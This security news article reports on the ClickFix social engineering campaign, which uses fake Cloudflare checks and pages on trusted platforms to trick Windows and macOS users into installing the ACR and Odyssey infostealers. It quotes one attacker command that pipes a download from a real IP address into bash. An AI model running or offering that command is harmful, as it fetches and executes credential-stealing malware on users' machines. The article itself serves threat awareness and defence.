A new and increasingly effective social engineering attack, dubbed ClickFix, is targeting both Windows and macOS users to deploy potent infostealer malware. This sophisticated technique deceives users into executing commands directly within their operating system’s command line, ultimately leading to the installation of malicious software designed to steal sensitive information. The ClickFix attack has gained traction due to its ability to bypass traditional email security measures and operate within the confines of browser sandboxes, rendering most security tools ineffective in detecting the malicious activity.
The attack typically originates when individuals search for cracked software or free versions of paid applications through search engines. Cybercriminals meticulously craft deceptive landing pages, strategically hosting them on trusted platforms such as Google Colab, Drive, Sites, and Groups. This tactic is employed to evade detection and blocking by security systems. Upon reaching these pages, victims are redirected based on their operating system. Windows users are presented with the ACR stealer, while macOS users are directed to pages that deploy the Odyssey infostealer.
Intel471 security researchers first identified this widespread campaign in June 2025 during routine malware hunting operations. Their investigation revealed that threat actors behind the ClickFix campaign were successfully exploiting both major operating systems through a unified and shared infrastructure, demonstrating a significant level of coordination and technical capability.
The ClickFix Infection Mechanism and Technical Execution
What distinguishes the ClickFix attack as particularly concerning is its reliance on fileless execution. When unsuspecting victims copy and paste the provided commands into their system interfaces, the malicious payloads are loaded directly into the computer’s memory. This fileless nature makes the malware virtually invisible to traditional antivirus software and endpoint detection solutions, which typically rely on scanning files for known signatures.
For Windows users, the infection chain involves a series of redirections culminating in a MEGA file hosting page. This page contains a password-protected ZIP archive. Inside this archive, the ACR stealer is disguised as a legitimate executable file, often named setup.exe. The ACR stealer is not only designed to steal credentials and personal data but also functions as a loader for additional threats. It has been observed installing other malware, such as SharkClipper, a cryptocurrency clipboard hijacker, further escalating the potential damage to the victim’s system and financial assets.
macOS users encounter a different, yet equally insidious, approach. They typically land on a page designed to mimic a Cloudflare security check. When users attempt to copy what appears to be a verification string from this fake page, they inadvertently copy a Base64-encoded shell command. Upon decoding, this command executes a malicious script. The command, as observed by researchers, is typically structured as follows: curl -s http://45.135.232.33/droberto39774 | nohup bash. This command silently downloads and executes the Odyssey infostealer malware.
The Odyssey stealer is capable of harvesting a broad spectrum of sensitive data from macOS systems. This includes stored passwords, browser cookies, cryptocurrency wallet credentials, information from Apple Notes, Keychain entries, and other critical system data. Once exfiltrated, this collected information is compressed into an archive file named out.zip for seamless transfer back to the attackers.
The ongoing evolution of social engineering tactics like ClickFix underscores the persistent threat posed by infostealer malware. The effectiveness of this method highlights the importance of user education regarding the risks associated with searching for and downloading cracked software. Users must remain vigilant against deceptive online content, especially when prompted to execute commands or download files from untrusted sources. The reliance on fileless execution and cloaking within trusted platforms presents a significant challenge for current cybersecurity defenses.
Moving forward, cybersecurity researchers will continue to monitor the development and deployment of the ClickFix attack and similar social engineering schemes. The focus will be on identifying new variations, understanding their infrastructure, and developing more robust detection and prevention mechanisms. The reliance on trusted platforms by attackers suggests a need for enhanced security protocols on these platforms themselves, alongside continued efforts to educate end-users about the evolving landscape of cyber threats. The battle against infostealer malware requires a multi-faceted approach, combining technical solutions with heightened user awareness.